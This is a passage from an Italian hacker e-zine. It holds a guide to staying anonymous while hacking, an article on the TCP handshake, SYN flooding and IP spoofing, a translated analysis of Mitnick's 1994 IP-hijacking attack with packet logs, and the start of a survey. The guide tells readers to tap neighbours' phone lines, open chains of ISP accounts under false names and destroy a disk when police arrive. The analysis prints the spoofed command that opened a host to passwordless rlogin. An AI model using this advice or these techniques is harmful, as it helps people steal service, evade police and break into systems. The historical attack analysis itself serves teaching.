topolino,bucare la nasa, ecc ecc.) forse  cosi', ma non dimenticate che il 
coglionazzo che cambio il giornale radio rai inserendo delle proteste contro
Bill fu sgamato(acchiappato) perche' aveva usato un suo login reale per 
entrare nel magico mondo di internet.... Quindi fate molta attenzione a come 
vi connettete e ad altre piccole cose.

Questo metodo  sicuro al cento per cento( cioe non vi sgameranno mai, a meno 
che non ci sia in mezzo veramente la NASA)

LA LINEA TELEFONICA : 
Se avete in mente un obbiettivo preciso, gia avete fatto il vostro bel 
footprinting, gia sapete il bug da utilizzare (se siete bravi avete gia fatto
il vostro programmino che sfruttera il bug), e soprattutto gia sapete cosa 
fare e come, la cosa piu importante  la linea telefonica.

Infatti mamma tel**om sapr esattamente dalla vostra linea di casa in che 
anno,mese,giorno, ora, minuti e secondi vi siete collegati a internet (si 
spera che non vada sventolando i tabulati in giro, ma cmq se la polizia va a 
fare un contollino....). 
Cercatevi una linea telefonica non vostra, molte volte nei palazzi, proprio 
fuori dalle vostre belle porte c' in alto uno sportellino con la + classica 
delle scritte tel**om. Bene, li ci sono i cavetti telefonici che portano alle 
case di tutto il palazzo (sinceramente non c'e nemmeno bisogno del tester, 
sono dei cavetti bianchi e rossi, a meno che non sappiate distinguere un 
cavetto telefonico da quelli dell'elettricita(in ogni caso non fate cazzate, 
se non sapete chiedete)una volta provati i cavetti del tel, basta collegarli
(senza romperli, ma soltando con due coccodrilletti) al modem (se non lo 
sapete fare chiedete) e viaggiare. 

( Queta soluzione  utile se volte fare dei colpetti del cazzo, altrimenti se
 la pula si mette di impegno state tranquilli che vi becca.

100% sicura  la connessione via cabina telefonica o centralina ( da li non vi
beccheranno mai solo dai log di internet) piu difficile  non farsi beccare 
dalla pula nella vita reale(cioe nel momento in cui siete fisicamente sulla 
cabina o centralina con il vostro bel portatile(ma questi non sono fatti miei)

In tutti e due i casi bisogna fare tutto il pi veloce possibile.

L'ABBONAMENTO A INTERNET : 
di certo non vi volete fare beccare con le mani nel sacco con il vostro nome e
cognome.... Quindi quando sottoscrivete un abbonamento fatelo con nomi falsi.
Per prima cosa creare  il primo collegamento a internet in modo anonimo. 
E' molto importante utilizzare o un internet cafe' o un quei login/pass di 
base che si trovano su tutte le riviste.

E' normale che se fate un abbonamento con nomi falsi da un abbonamento con il 
nome vero... prima o poi vi beccheranno.
Ora viene il bello: colleghiamoci ad internet con l'abbonamento falso e 
facciamone un altro falso ad un altro provider. Poi mi collego con il secondo 
nome falso e ne sottoscrivo un terzo, e via dicendo. In pratica :(faccio un 
esempio con : provider login/pass)

tin kola/brodo --------> libero kola/pasta \/\/\/ mi scollego da tin e mi 
riccolego con libero.
libero kola/pasta ------->jumpy koka/kola \/\/\/ mi socollego da libero e mi 
ricollego con jumpy.
jumpy koka/kola ------> kataweb e cosi' via continuate finche non siete 
stanchi...

Almeno cosi' ci sara' un bel po da divertirsi per la pula.... :))
Questo non  sicuro, ma almeno ci vorra' pi tempo per beccarvi. In ogni caso 
bisogna essere prudenti e non fare cazzate.

USI E COSTUMI DEL COMPUTEREEE : 
Non chiamate il vosto sistema con il vostro nome e cognome, non intestate ne'
regisrate alcun programma a vostro nome, non fate niente di niente a vostro 
nome. 

Sul computer non ci deve essere nessu indizio su chi siate e cosa facciate nel
la vostra vita reale.
La cosa migliore  mettere 2 (due) hard disk con due sistemi operativi non 
comunicanti tra loro. Cioe' non basta fare due partizioni con win. Ma devono 
essere due sistemi operativi : tipo win/linux, io ho fatto anche win98/win98 
da fare partire con bootmagic(ti chiede all'inizio con quale s.o vuoi partire.
Su di uno ci mettete tutto quello che cazzo vi pare, sull'altro il minimo 
indispensabile per un buon hakkaggio. E mi raccomando quando sentite bussare 
la porta  non aspettate nessuno.... staccate il secondo hd e mangiatelo...:).

Cosi' dovreste essere al sicuro (almeno virtualmente)

Mi sembra inutile dire: mettete un firewall, disabilitate java, non accettate 
cookie ecc ecc

SIATE PARANOICI, LA SICUREZZA DEL MONDO DIPENDE DA VOI.......

CHE LA FORZA SIA CON TEEEEEEEEEEEEE
NON PUO' PIOVERE PER SEMPRE
SEI SOLO CHIACCHIERE E DISTINTIVO
NON ESISTONO IL BENE E IL MALE, E' LA MENTE UMANA A RENDERLI TALI
C'E' ARIA IN ABBONDANZA A SPACEBALL.........
CHE TE LO DICO A FARE
FACCI LA STRETTA PUZZOSA.. COME NON SAI FARE LA STRETTA PUZZOSA???
IMBECILLE NE SENSO CHE IMBELLI...
Beh un paio di cosette da film(chi sa chi cono me lo faccia sapere)

Sperando di aver insegnato qualcosa di utile a chi non lo sapeva, e di aver 
fatto fare 4 risate a chi queste cose le da per scontate, io mi congedo 
ricordandovi che cmq potete scrivermi per bestemmie di vario genere at : 

sash4@inwind.it
happy hack 

---Sash4---

----------------------------------------------------------------[ hAcKinG ]---
===] BASI DI UN COLLEGAMENTO TRA DUE COMPUTER, 3-WAY_HANDSHAKE, SYNFLOOD ]====
-----[ WhItEfIrE ]------------------------------------------------------------

Ciao a tutti. eccomi addirittura al mio secondo articolo! NOn ci avrei mai
creduto, eppure eccomi qui.

ATTENZIONE:
non voglio essere accusato di copy & paste perch questo  materiale
facilmente reperibile sulla rete!

In questo articolo intendo spiegare le basi di un semplice colegamento tra due
computer (telnet, web, ecc ecc).
Questi collegamenti funzionano tramite lo scambio di pacchetti IP, che 
contengono
vari dati come la provenienza e destinazione, tipo di servizio, protocollo ecc
ecc. Potete paragonare questi pakketti all' header di una mail (c' tutto su 
chi
la manda e chi la riceve, manca solo il vostro indirizzo e numero di telefono 
=).
Prendiamo per esempio il collegamento tra un il nostro pc e un web server su 
cui
abbiamo una shell, il server per rispondere deve prima riconoscerci  e sapere
il nostro ip, qu entrano in gioco tre tipi di pacchetti:

[-] SYN (eh si, avete letto bene,  proprio lui il famigerato SYN tanto usato
negli attacchi - MIMIO che pauraaaaaaaaaaaaaaaa!)

[ -] ISNa e ISNb (  una serie di numeri )

[-] ACK (anche questo  usato per i flood, ma meno del SYN) noto anche come
ACKNOWLEDGE (riconoscimento [per chi ha 1- in Inglese]).
Ma questi sono solo i comandi principali che possono comparire in una 
connessione,
ecco gli altri:
FIN = Finished, una delle tue makkine ha finito di inviare i dati
PSH = Push, Invia i dati al ricevente il prima possibile
RST = rompi la connessione
URG = dati urgenti in arrivo dall'origine.
 
La connessione e soprattutto il riconoscimento avvengono cos:

IIIIIIIIIIIIII                     IIIIIIIIIIIIII
I Computer A I --------------------I Computer B I
IIIIIIIIIIIIII                     IIIIIIIIIIIIII

( nostro pc )                       ( web server )

Il computer A tenta di connettersi e invia a B un pakketto SYN (Syncronyze
Sequence Number) e un altro pakketto l'ISNa che  una serie di dati sotto 
forma
di numeri, il SYN non  altro che una richiesta di connessione che chiede a B
di controllare l'ISNa (mandato da A) e se tutto va bene di avviare la 
procedura
di login. Il computer B ricevuto il SYN risponde con un SYN e un ISNb e infine
un ACK che non  altro che l'ISNa incrementato di 1, questa incrementazione
permette di capire in che direzione vanno i dati.
Infine A risponde con l'ACK contenente l'ISNb.
In poche parole:
3 WAY HANDSHAKE

A ==> SYN, ISNa ==> B
B ==> SYN; ISNb, ACK (ISNa + 1) ==> A
A ==> ACK (ISNb) ==> B

Questo tipo di connessione si chiama 3 WAY HANDSHAKE
Spero che abbiate capito, perch tanto non ve lo rispiego! :))
Ogni pakketto ha dei propri valori, questo  lo skema di un semplice pakketto
IP:

___________________________________________________________________________
4-bit               |  4-bit            |  8-bit         |     16-bit     |
                    |  Lunghezza        |  Tipo di       |     Lunghezza  |
Versione            |  Intestazione     |  Servizio      |     Totale     |
--------------------------------------------------------------------------|
16-bit                 |  3-bit                  |  13-bit                | 
                       |                         |  Variabili di          |
Identificazione        |  Flags                  |  Frammento             |
--------------------------------------------------------------------------|
8-bit                  |  8-bit                |  16-bit                  |
Tempo da               |                       |                          |
"Vivere"               |  Protocollo           |  Controllo Intestazione  |
--------------------------------------------------------------------------|
32-bit                                                                    |
                                                                          |
Indirizzo di provenienza                                                  |
--------------------------------------------------------------------------|
32-bit                                                                    |
                                                                          |
Indirizzo di destinazione                                                 |
--------------------------------------------------------------------------|
Opzioni ( possono anche non esserci )                                     |
                                                                          |
--------------------------------------------------------------------------|
                                                                          |
Dati ( finalmente! )                                                      |
__________________________________________________________________________|

Questo  un pakketto molto inaffidabile e per questo viene solamente (o quasi)
utilizzato in combinazione con altri pakketti + affidabili (TCP, UDP).
Ma l'IP e un pacchetto molto importante poich senza di esso non esisterebbe
alcun tipo di connessione
Come potete vedere ogni informazione del pakketto ha un suo valore: 3, 4, 8,
13, 16 e 32 Bit.
Le informazioni + rilevanti nel pakketto sono l'ip di partenza e destinazione
e sono a 32 Bit.
Questo invece  lo schema di un pacchetto per il protocollo TCP:

TCP:
_________________________________________________________________________
16-bit                                  |       16-bit                   |
                                        |       Porta di                 |
Porta di provenienza                    |       Destinazione             |
-------------------------------------------------------------------------|
32-bit                                                                   |
                                                                         |
Sequenza di numeri                                                       |
-------------------------------------------------------------------------|
32-bit                                                                   |
                                                                         |
Numeri di indentificazione                                               |
-------------------------------------------------------------------------|
4-bit            | 6-bit             |     6-bit          | 16-bit       |
Lunghezza        | Riservato         |     Flags          | Grandezza    |
Intestazione     |                   |                    | Finestra     |
-------------------------------------------------------------------------|
16-bit                                      | 16-bit                     |
Controllo del TCP                           | Indice                     |
                                            | Urgente                    |
-------------------------------------------------------------------------|
Opzioni (possono non esserci)                                            |
-------------------------------------------------------------------------|
                                                                         |
Dati ( di lunghezza variabile ) se ci sono                               |
_________________________________________________________________________|

EVOLUTIONS

[-] Il 3 Way Handshake e soprattutto i pacchetti SYN possono essere usati in 
vari
attacchi come il SYN attack che tempesta un Ip di SYN che vengono allocati 
nella
memoria del server in attesa di un ACK e quindi una connessione (che non 
avverr
mai, povero illuso :-B Bhuahahahaha).
Il codice C per linux, ( *NIX POWER!!! ) si trova tra gli allegati.



[-] Spoofing
In una connessione tramite pakketti, qualunque essa sia,  possibile spoofare
i pakketti.

--------------------- MI RIVOLGO A VOI, O OTTUSI --------------------------
Spoofare significa modificare l'header dei pakketti, per cambiarne l' ip di
provenienza!
--------------------------------- EOF -------------------------------------

Spoofando i pakketti ci possiamo o ANONIMIZZARE o SPACCIARCI per qualcun 
altro.
- Anonimizzandoci possiamo evitare di essere scoperti
- Spacciandoci per qualcun'altro possiamo ottenere l'accesso ad un server che
permette le connessioni solo da determinati host! (politica errata)
- dulcis in Fundo le tanto amate fakemail
ALTRO CHE TROJANS QUESTA E' ARTE!!!!!!!!!!!!!!!!!!!!!1

Comunque anche per questa volta  finita (sigh), per scendere nei particolari
dello spoofing ci vorrebbero almeno 100 pagine! :)

ByeZ

---WhItEfIrE---

----------------------------------------------------------------[ HacKinG ]---
===] DESCRIZIONE DI UN ATTACCO DI MITNICK -IP HJACKING- ]=====================
-----[ Kalidor ]--------------------------------------------------------------

-Premessa-
Questo articolo e' stato scritto sulla base del rapporto di Tsutomu Shimomura
(tsutomu@ariel.sdsc.edu) del 25 gennaio 1995 (l'ho tradotto e ho cercato di
spiegarlo in modo piu' semplice). Per commenti intelligenti
mailto:kalidor@tin.it (le flame verranno ignorate). I concetti di base sono
tutti spiegati nell'articolo di Whitefire (basi di un collegamento tra due
computer, 3-way handshake, synflood).

-Introduzione-
L'attacco e' stato effettuato il 25 dicembre 1994 (il rapporto venne inviato
il mese dopo) contro la rete di computer di Tsutomu Shimomura, un fisico
informatico della San Diego Supercomputer Center.
Shimomura lavora anche come esperto della sicurezza, il che rendeva il suo
sistema un ambito bersaglio per gli attacchi e cio' ci permette anche di
sapere nei dettagli cosa accadde. Infatti Shimomura usava tcpdump per
monitorare il traffico in entrata alla sua rete internet e mandava
periodicamente i log a un'altra rete per analisi.

Sono stati usati due tipi di attacco, IP spoofing e TCP sequence number
prediction (previsione dei numeri sequenziali, in poche parole la previsione
degli isn e ack). Questo tipo di attacco si chiama IP Hijacking, cioe'
l'intrusione in una connessione TCP.

-Configurazione-
Kevin Mitnick effettuo' il suo attacco da 2 server, toad.com e un server a
Chicago, apollo.it.luc.edu (che da ora chiamero' apollo).

La rete di Shimomura era cosi' composta:
server1: uno SPARCstation con Solaris 1 che hostava x-terminal
x-terminal: uno SPARCstation senza HD con Solaris 1
obbiettivo: l'apparente obbiettivo dell'attacco

-Descrizione-
L'attacco inizia alle 14:09:32. Vengono effettuati dei primi scan da toad.com:

14:09:32 toad.com# finger -l @target
14:10:21 toad.com# finger -l @server1
14:10:50 toad.com# finger -l root@server1
14:11:07 toad.com# finger -l @x-terminal
14:11:38 toad.com# showmount -e x-terminal
14:11:49 toad.com# rpcinfo -p x-terminal
14:12:05 toad.com# finger -l root@x-terminal

Lo scopo di questi scan e' probabilmente quello di determinare se c'e' qualche
rapporto di fiducia tra i vari server (es: un accesso rlogin senza password)
che potrebbe essere sfruttato con un attacco di IP spoofing. I numeri delle
sport (porte di sorgente) indicano che l'attaccante  root su toad.com .
Questi scan sono simili a quelli effettuati da SATAN, ma non automatici.

Nella seconda fase dell'attacco vengono inviati 30 pacchetti SYN alla porta di
rlogin di server1. Questi pacchetti provengono da un indirizzo ip inesistente
(130.92.6.97) in modo da impedire qualsiasi risposta da esso. Per loggarli e'
stato usato tcpdump. Per indicare le flag esso usa:

S = syn
P = push
R = rst
F = fin
U = urg

Ecco il log dei pacchetti (server.login indica server1 alla porta di rlogin):

14:18:22.516699 130.92.6.97.600 > server.login: S 1382726960:1382726960(0)
  win 4096
14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0)
  win 4096
14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0)
  win 4096
14:18:22.830111 130.92.6.97.603 > server.login: S 1382726963:1382726963(0)
  win 4096
14:18:22.886128 130.92.6.97.604 > server.login: S 1382726964:1382726964(0)
  win 4096
14:18:22.943514 130.92.6.97.605 > server.login: S 1382726965:1382726965(0)
  win 4096
14:18:23.002715 130.92.6.97.606 > server.login: S 1382726966:1382726966(0)
  win 4096
14:18:23.103275 130.92.6.97.607 > server.login: S 1382726967:1382726967(0)
  win 4096
14:18:23.162781 130.92.6.97.608 > server.login: S 1382726968:1382726968(0)
  win 4096
14:18:23.225384 130.92.6.97.609 > server.login: S 1382726969:1382726969(0)
  win 4096
14:18:23.282625 130.92.6.97.610 > server.login: S 1382726970:1382726970(0)
  win 4096
14:18:23.342657 130.92.6.97.611 > server.login: S 1382726971:1382726971(0)
  win 4096
14:18:23.403083 130.92.6.97.612 > server.login: S 1382726972:1382726972(0)
  win 4096
14:18:23.903700 130.92.6.97.613 > server.login: S 1382726973:1382726973(0)
  win 4096
14:18:24.003252 130.92.6.97.614 > server.login: S 1382726974:1382726974(0)
  win 4096
14:18:24.084827 130.92.6.97.615 > server.login: S 1382726975:1382726975(0)
  win 4096
14:18:24.142774 130.92.6.97.616 > server.login: S 1382726976:1382726976(0)
  win 4096
14:18:24.203195 130.92.6.97.617 > server.login: S 1382726977:1382726977(0)
  win 4096
14:18:24.294773 130.92.6.97.618 > server.login: S 1382726978:1382726978(0)
  win 4096
14:18:24.382841 130.92.6.97.619 > server.login: S 1382726979:1382726979(0)
  win 4096
14:18:24.443309 130.92.6.97.620 > server.login: S 1382726980:1382726980(0)
  win 4096
14:18:24.643249 130.92.6.97.621 > server.login: S 1382726981:1382726981(0)
  win 4096
14:18:24.906546 130.92.6.97.622 > server.login: S 1382726982:1382726982(0)
  win 4096
14:18:24.963768 130.92.6.97.623 > server.login: S 1382726983:1382726983(0)
  win 4096
14:18:25.022853 130.92.6.97.624 > server.login: S 1382726984:1382726984(0)
  win 4096
14:18:25.153536 130.92.6.97.625 > server.login: S 1382726985:1382726985(0)
  win 4096
14:18:25.400869 130.92.6.97.626 > server.login: S 1382726986:1382726986(0)
  win 4096
14:18:25.483127 130.92.6.97.627 > server.login: S 1382726987:1382726987(0)
  win 4096
14:18:25.599582 130.92.6.97.628 > server.login: S 1382726988:1382726988(0)
  win 4096
14:18:25.653131 130.92.6.97.629 > server.login: S 1382726989:1382726989(0)
  win 4096

Si puo' notare che l'isn di ogni pacchetto (es: 1382726960 quello del primo)
e' incrementato di 1 dal precendente, invece che di 128000 (che sarebbe il
default dei server dell'epoca).

Cio' indica che sono pacchetti inviati manualmente. Il loro scopo e' quello di
riempire la coda di connessione di server1 con connessioni mezze aperte, in
modo che server1 non risponda piu' a quella porta. Questo attacco e' chiamato
syn flooding (come spiegato nell'articolo di Whitefire) e permette di
effettuare l'attacco di IP hijacking senza che server1 possa interferire.

Ora vengono effettuati 20 tentativi di connessione da apollo a x-terminal su
telnet (x-terminal.shell indica x-terminal alla porta di telnet):

14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell:
  S 1382726990:1382726990(0) win 4096
14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000:
  S 2021824000:2021824000(0) ack 1382726991 win 4096
14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell:
  R 1382726991:1382726991(0) win 0
14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell:
  S 1382726991:1382726991(0) win 4096
14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999:
  S 2021952000:2021952000(0) ack 1382726992 win 4096
14:18:26.775037 apollo.it.luc.edu.999 > x-terminal.shell:
  R 1382726992:1382726992(0) win 0
14:18:26.775395 apollo.it.luc.edu.999 > x-terminal.shell:
  R 1382726992:1382726992(0) win 0
14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell:
  S 1382726992:1382726992(0) win 4096
14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998:
  S 2022080000:2022080000(0) ack 1382726993 win 4096
14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell:
  R 1382726993:1382726993(0) win 0
14:18:27.544069 apollo.it.luc.edu.997 > x-terminal.shell:
  S 1382726993:1382726993(0) win 4096
14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997:
  S 2022208000:2022208000(0) ack 1382726994 win 4096
14:18:27.794456 apollo.it.luc.edu.997 > x-terminal.shell:
  R 1382726994:1382726994(0) win 0
14:18:28.054114 apollo.it.luc.edu.996 > x-terminal.shell:
  S 1382726994:1382726994(0) win 4096
14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996:
  S 2022336000:2022336000(0) ack 1382726995 win 4096
14:18:28.305578 apollo.it.luc.edu.996 > x-terminal.shell:
  R 1382726995:1382726995(0) win 0
14:18:28.564333 apollo.it.luc.edu.995 > x-terminal.shell:
  S 1382726995:1382726995(0) win 4096
14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995:
  S 2022464000:2022464000(0) ack 1382726996 win 4096
14:18:28.811591 apollo.it.luc.edu.995 > x-terminal.shell:
  R 1382726996:1382726996(0) win 0
14:18:29.074990 apollo.it.luc.edu.994 > x-terminal.shell:
  S 1382726996:1382726996(0) win 4096
14:18:29.274572 x-terminal.shell > apollo.it.luc.edu.994:
  S 2022592000:2022592000(0) ack 1382726997 win 4096
14:18:29.354139 apollo.it.luc.edu.994 > x-terminal.shell:
  R 1382726997:1382726997(0) win 0
14:18:29.354616 apollo.it.luc.edu.994 > x-terminal.shell:
  R 1382726997:1382726997(0) win 0
14:18:29.584705 apollo.it.luc.edu.993 > x-terminal.shell:
  S 1382726997:1382726997(0) win 4096
14:18:29.755054 x-terminal.shell > apollo.it.luc.edu.993:
  S 2022720000:2022720000(0) ack 1382726998 win 4096
14:18:29.840372 apollo.it.luc.edu.993 > x-terminal.shell:
  R 1382726998:1382726998(0) win 0
14:18:30.094299 apollo.it.luc.edu.992 > x-terminal.shell:
  S 1382726998:1382726998(0) win 4096
14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992:
  S 2022848000:2022848000(0) ack 1382726999 win 4096
14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell:
  R 1382726999:1382726999(0) win 0
14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell:
  S 1382726999:1382726999(0) win 4096
14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991:
  S 2022976000:2022976000(0) ack 1382727000 win 4096
14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell:
  R 1382727000:1382727000(0) win 0
14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell:
  S 1382727000:1382727000(0) win 4096
14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990:
  S 2023104000:2023104000(0) ack 1382727001 win 4096
14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell:
  R 1382727001:1382727001(0) win 0
14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell:
  S 1382727001:1382727001(0) win 4096
14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989:
  S 2023232000:2023232000(0) ack 1382727002 win 4096
14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell:
  R 1382727002:1382727002(0) win 0
14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell:
  S 1382727002:1382727002(0) win 4096
14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988:
  S 2023360000:2023360000(0) ack 1382727003 win 4096
14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell:
  R 1382727003:1382727003(0) win 0
14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell:
  S 1382727003:1382727003(0) win 4096
14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987:
  S 2023488000:2023488000(0) ack 1382727004 win 4096
14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell:
  R 1382727004:1382727004(0) win 0
14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell:
  S 1382727004:1382727004(0) win 4096
14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986:
  S 2023616000:2023616000(0) ack 1382727005 win 4096
14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell:
  R 1382727005:1382727005(0) win 0
14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell:
  S 1382727005:1382727005(0) win 4096
14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985:
  S 2023744000:2023744000(0) ack 1382727006 win 4096
14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell:
  R 1382727006:1382727006(0) win 0
14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell:
  S 1382727006:1382727006(0) win 4096
14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984:
  S 2023872000:2023872000(0) ack 1382727007 win 4096
14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell:
  R 1382727007:1382727007(0) win 0
14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell:
  S 1382727007:1382727007(0) win 4096
14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983:.
  S 2024000000:2024000000(0) ack 1382727008 win 4096
14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell:
  R 1382727008:1382727008(0) win 0
14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell:
  S 1382727008:1382727008(0) win 4096
14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982:
  S 2024128000:2024128000(0) ack 1382727009 win 4096
14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell:
  R 1382727009:1382727009(0) win 0
14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell:
  S 1382727009:1382727009(0) win 4096
14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981:
  S 2024256000:2024256000(0) ack 1382727010 win 4096
14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell:
  R 1382727010:1382727010(0) win 0

I pacchetti inviati da apollo sono sempre incrementati di 1 ma questa volta
gli ack di x-terminal vengono inviati a un ip esistente. Ed e' proprio questo
che vuole l'attaccante, egli vuole determinare il comportamento del generatore
di isn di x-terminal. Si nota anche che stavolta vengono inviati anche dei
pacchetti di RST per chiudere le connessioni, in modo da non intasare anche
x-terminal che sara' l'obbiettivo dell'attacco di spoofing.

Ora l'attaccante sa che gli isn incrementano di 128000 ogni connessione
(osservando quelli consecutivi), quindi il prossimo isn sara' piu' grande di
128000 dell'ultimo.

Ora inizia l'attacco di IP hijacking vero e proprio. Vediamo una richiesta di
connessione SYN da server1 a x-terminal su rlogin. In realta' e' l'attaccante
che sta spoofando il pacchetto in modo da farlo provenire apparentemente da
server1.

L'ipotesi dell'attaccante e' che x-terminal si fida di server1 e che fara'
qualunque cosa server1 (o qualcuno che si finge tale) chiedera'. Ora
x-terminal risponde con un syn-ack che deve essere ackappato da server1
(ricordate 3-way handshaking?) perche' sia aperta la connessione. Dato che il
vero server1 non puo' rispondere a x-terminal (se potesse farlo risponderebbe
con un RST in modo da terminare la connessione non richiesta da lui, capito
lo scopo del syn flood?) viene generato un altro pacchetto spoofato da server1
contenente l'ack per aprire la connessione. A questo punto e' aperta una
falsa connessione tra server1 e x-terminal su rlogin e puo' essere inviato
qualsiasi comando di shell. Normalmente sarebbe stato necessario conoscere
l'isnb inviato da x-terminal per rispondere con un secondo ACK valido, ma
l'attaccante sa gia' qual'e', dato che puo' essere predetto in base alle
risposte di x-terminal ai 20 tentativi di connessione precedenti (ultimo isnb
+ 128000). Ecco i 2 pacchetti spoofati inviati dall'attaccante:

14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) 
win 4096
14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096

Il secondo ack e' 2024384001 che sarebbe 2024256000 (vedi l'ultimo pacchetto
inviato da x-terminal) + 128000 + 1 (si aggiunge ancora 1 come spiegato
nell'articolo di Whitefire).

Adesso l'attaccante puo' inviare il comando che gli permettera' l'accesso a
x-terminal:

14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096
14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096
14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096

che corrisponde a:

14:18:37 server# rsh x-terminal "echo + + >>/.rhosts"

Quel comando, come molti sanno, permette di attivare l'accesso rlogin senza
password a CHIUNQUE, attaccante compreso; in modo piu' specifico scrive "+ +"
nel file /.rhosts, che contiene la lista degli host che possono accedere a
rlogin senza password, e quel + + equivale a dire "tutti". Ora il nostro
attaccante ha accesso totale a x-terminal.

Per finire viene chiusa la falsa connessione:

14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096
14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096
14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096
14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) 
win 4096
14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) 
win 4096

(questi pacchetti servono a chiudere una connessione secondo il 4-way
connection closing del tcp: in parole povere i 2 membri della connessione
mandano un pacchetto con una FIN che deve a sua volta essere ackappata,
richiedendo 4 pacchetti in tutto)

E vengono chiuse tutte le connessioni mezze aperte su server1, in modo da
liberarlo:

14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) 
win 4096
14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) 
win 4096
14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) 
win 4096
14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) 
win 4096
14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) 
win 4096
(ecc...)

Ora il povero server1 manda un RST per chiudere una connessione che non ha mai
fatto (cosa che avrebbe fatto subito dopo il primo SYN dell'attaccante se non
fosse stato intasato), ma ormai e' troppo tardi.

-Riassunto-
* L'attaccante fa degli scan da toad.com per verificare se esiste una
  condizione di fiducia tra server1 e x-terminal
* esegue un synflood verso server1 per impedirgli di interferire col suo
  attacco
* fa dei tentativi di connessione da apollo a x-terminal per determinare
  l'isnb successivo e quindi generare un ack valido
* stabilisce una connessione falsa tra server1 (spoofato) e x-terminal usando
  l'isnb predetto
* invia il comando "echo + + >>/.rhosts" per permettergli l'accesso a
  x-terminal
* chiude la falsa connessione con x-terminal e libera server1 resettando tutte
  le connessioni aperte dal synflood

-Epilogo-
Per molti di voi questa cosa vi sara' sembrata esageratamente complessa, per
non dire incomprensibile:)
in effetti e' un attacco molto raffinato che si distacca molto dalle
metodologie di attacchi comuni, come exploit prefabbricati pronti all'uso e
roba varia, che sono molto semplici. Io ho cercato di rendere la cosa piu'
comprensibile, anche se e' cosi' complicato il processo che e' difficile
spiegarlo con parole semplici. Consolatevi che il documento originale era
molto peggio e in inglese:)

(lo potete trovare a
http://www.hack-net.com/html/knowledge_center/
                                  hnc_view_doc.php3?show_doc=MoreMitnick.txt).

Vi consiglio, se non avete capito, di rileggere piu' attentamente che non e'
cosi' difficile come sembra.
Chiedo scusa a Oldiron se non gli ho fatto l'articolo promesso per ais2
(scuola del kazzo).

Spero sia piu' contento ora:)

(NOTA DI OLDIRON61: Azz se sono contento! ;-))

cya

---Kalidor---



----------------------------------------------------------------[ HacKinG ]---
===] GIUDIZIO DEI NAVIGATORI SUGLI HACKERS ]==================================
-----[ ZETA ]-----------------------------------------------------------------


Info:
L'argomento mi  venuto in mente, mentre guardavo la TV (non dir il canale) 
ed
un giornalista parlava di Hackers,ho pensato :
"ma che disinformazione,se i giornalisti dicono queste sciocchezze figuriamoci
la gente comune",cos ho deciso di fare un sondaggio e vedere la gente che ne
pensa !!!!.

Bene ora possiamo cominciare!

********************************START*****************************************
               
A )  Hai mai sentito la parola Hacker ?
B )  Chi sono ?
C )  le tue considerazioni 
                                 <_Lupin_>

A)  sentita dove?
    forse in 1 telenovelas in tv
    non mi sembra io leggo altre cose
    no, forse sono troppo anziana x saperlo            

                                  <Zulu__>
   
A)   beh si che l'ho sentita

 B) gli hackers sono dei pirati informatici che hanno una grande conoscenza 
